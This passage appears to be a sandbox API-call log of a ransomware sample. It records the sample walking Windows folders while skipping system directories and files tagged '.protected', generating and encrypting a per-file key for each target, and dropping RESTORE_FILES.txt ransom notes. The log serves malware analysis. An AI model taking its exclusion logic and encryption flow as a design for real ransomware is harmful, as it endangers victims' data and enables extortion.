(lpString1="RacWmiDataBookmarks.dat.protected", lpString2="Windows") returned -1 [0093.229] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat.protected", lpString2="Program Files") returned 1 [0093.229] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat.protected", lpString2="Program Files (x86)") returned 1 [0093.229] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat.protected", lpString2="$Recycle.bin") returned 1 [0093.229] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat.protected", lpString2="System Volume Information") returned -1 [0093.229] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.protected") returned 80 [0093.229] StrStrIW (lpFirst="RacWmiDataBookmarks.dat.protected", lpSrch=".protected") returned=".protected" [0093.230] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.230] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="Windows") returned -1 [0093.230] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="Program Files") returned 1 [0093.230] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="Program Files (x86)") returned 1 [0093.230] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="$Recycle.bin") returned 1 [0093.230] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="System Volume Information") returned -1 [0093.230] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat") returned 66 [0093.230] StrStrIW (lpFirst="RacWmiEventData.dat", lpSrch=".protected") returned 0x0 [0093.230] lstrcmpW (lpString1="RacWmiEventData.dat", lpString2="RESTORE_FILES.txt") returned -1 [0093.230] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.230] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.230] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.230] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.230] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.230] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.230] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.230] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.230] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RESTORE_FILES.txt") returned 64 [0093.230] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.230] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.230] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.230] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RESTORE_FILES.txt") returned 64 [0093.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RESTORE_FILES.txt" (normalized: "c:\\users\\all 
users\\microsoft\\rac\\statedata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.231] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.231] lstrcmpiW (lpString1="Temp", lpString2="Windows") returned -1 [0093.231] lstrcmpiW (lpString1="Temp", lpString2="Program Files") returned 1 [0093.231] lstrcmpiW (lpString1="Temp", lpString2="Program Files (x86)") returned 1 [0093.231] lstrcmpiW (lpString1="Temp", lpString2="$Recycle.bin") returned 1 [0093.231] lstrcmpiW (lpString1="Temp", lpString2="System Volume Information") returned 1 [0093.231] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp") returned 41 [0093.231] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0093.231] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0093.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*") returned 43 [0093.231] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.231] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.231] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.231] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.231] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.231] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\.") returned 43 [0093.231] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.231] FindNextFileW (in: 
hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.232] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.232] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.232] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.232] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.232] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.232] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\..") returned 44 [0093.232] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.232] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.232] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.232] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.232] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.232] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.232] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.232] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.232] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\RESTORE_FILES.txt") returned 59 [0093.232] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.232] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.232] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.232] lstrcmpiW (lpString1="sql2950.tmp", lpString2="Windows") returned -1 [0093.232] lstrcmpiW (lpString1="sql2950.tmp", lpString2="Program Files") returned 1 
[0093.232] lstrcmpiW (lpString1="sql2950.tmp", lpString2="Program Files (x86)") returned 1 [0093.232] lstrcmpiW (lpString1="sql2950.tmp", lpString2="$Recycle.bin") returned 1 [0093.232] lstrcmpiW (lpString1="sql2950.tmp", lpString2="System Volume Information") returned -1 [0093.232] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2950.tmp") returned 53 [0093.232] StrStrIW (lpFirst="sql2950.tmp", lpSrch=".protected") returned 0x0 [0093.232] lstrcmpW (lpString1="sql2950.tmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.232] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.232] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2950.tmp" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql2950.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.232] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.232] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="Windows") returned -1 [0093.232] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="Program Files") returned 1 [0093.232] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="Program Files (x86)") returned 1 [0093.232] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="$Recycle.bin") returned 1 [0093.232] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="System Volume Information") returned -1 [0093.233] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2A2C.tmp") returned 53 [0093.233] 
StrStrIW (lpFirst="sql2A2C.tmp", lpSrch=".protected") returned 0x0 [0093.233] lstrcmpW (lpString1="sql2A2C.tmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.233] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.233] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2A2C.tmp" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql2a2c.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.233] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.233] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.233] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\RESTORE_FILES.txt") returned 59 [0093.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.234] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.234] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.234] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\RESTORE_FILES.txt") returned 54 [0093.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\RAC\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.234] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.234] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.234] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.234] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.234] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.235] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.235] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RESTORE_FILES.txt") returned 50 [0093.235] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.235] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.235] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.235] lstrcmpiW (lpString1="Search", lpString2="Windows") returned -1 [0093.235] lstrcmpiW (lpString1="Search", lpString2="Program Files") returned 1 [0093.235] lstrcmpiW (lpString1="Search", lpString2="Program Files (x86)") returned 1 [0093.235] lstrcmpiW (lpString1="Search", lpString2="$Recycle.bin") returned 1 [0093.235] lstrcmpiW (lpString1="Search", lpString2="System Volume Information") returned -1 [0093.235] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search") returned 39 [0093.235] lstrcmpW (lpString1="Search", lpString2=".") returned 1 [0093.235] lstrcmpW 
(lpString1="Search", lpString2="..") returned 1 [0093.235] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*") returned 41 [0093.235] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.235] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.235] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.235] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.235] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.235] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.235] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\.") returned 41 [0093.235] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.235] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.235] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.235] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.235] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.235] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.235] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.235] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\..") returned 42 [0093.235] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.235] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.235] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.235] lstrcmpiW (lpString1="Data", lpString2="Windows") returned -1 [0093.236] lstrcmpiW 
(lpString1="Data", lpString2="Program Files") returned -1 [0093.236] lstrcmpiW (lpString1="Data", lpString2="Program Files (x86)") returned -1 [0093.236] lstrcmpiW (lpString1="Data", lpString2="$Recycle.bin") returned 1 [0093.236] lstrcmpiW (lpString1="Data", lpString2="System Volume Information") returned -1 [0093.236] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data") returned 44 [0093.236] lstrcmpW (lpString1="Data", lpString2=".") returned 1 [0093.236] lstrcmpW (lpString1="Data", lpString2="..") returned 1 [0093.236] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*") returned 46 [0093.236] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.236] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.236] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.236] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.236] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.236] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.236] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\.") returned 46 [0093.236] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.236] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.237] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.237] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.237] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.237] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.237] lstrcmpiW 
(lpString1="..", lpString2="System Volume Information") returned -1 [0093.237] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\..") returned 47 [0093.237] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.237] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.237] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.237] lstrcmpiW (lpString1="Applications", lpString2="Windows") returned -1 [0093.237] lstrcmpiW (lpString1="Applications", lpString2="Program Files") returned -1 [0093.237] lstrcmpiW (lpString1="Applications", lpString2="Program Files (x86)") returned -1 [0093.237] lstrcmpiW (lpString1="Applications", lpString2="$Recycle.bin") returned 1 [0093.237] lstrcmpiW (lpString1="Applications", lpString2="System Volume Information") returned -1 [0093.237] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned 57 [0093.237] lstrcmpW (lpString1="Applications", lpString2=".") returned 1 [0093.237] lstrcmpW (lpString1="Applications", lpString2="..") returned 1 [0093.237] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*") returned 59 [0093.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.237] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.237] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.237] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.237] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.237] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 
[0093.237] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\.") returned 59 [0093.237] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.237] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.237] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.237] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.237] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.237] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.237] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.237] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\..") returned 60 [0093.237] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.237] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.238] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.238] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\RESTORE_FILES.txt") returned 75 [0093.238] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.238] lstrcmpW (lpString1="RESTORE_FILES.txt", 
lpString2="RESTORE_FILES.txt") returned 0 [0093.238] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.238] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0093.238] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.238] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.238] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\RESTORE_FILES.txt") returned 75 [0093.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.238] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.238] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.238] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\RESTORE_FILES.txt") returned 62 [0093.238] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.238] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.238] FindNextFileW (in: 
hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.238] lstrcmpiW (lpString1="Temp", lpString2="Windows") returned -1 [0093.238] lstrcmpiW (lpString1="Temp", lpString2="Program Files") returned 1 [0093.238] lstrcmpiW (lpString1="Temp", lpString2="Program Files (x86)") returned 1 [0093.238] lstrcmpiW (lpString1="Temp", lpString2="$Recycle.bin") returned 1 [0093.238] lstrcmpiW (lpString1="Temp", lpString2="System Volume Information") returned 1 [0093.238] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp") returned 49 [0093.238] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0093.238] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0093.238] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*") returned 51 [0093.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.238] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.238] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.238] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.238] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.239] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.239] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\.") returned 51 [0093.239] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.239] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.239] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.239] lstrcmpiW (lpString1="..", 
lpString2="Program Files") returned -1 [0093.239] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.239] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.239] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.239] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\..") returned 52 [0093.239] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.239] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.239] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.239] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.239] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.239] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.239] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 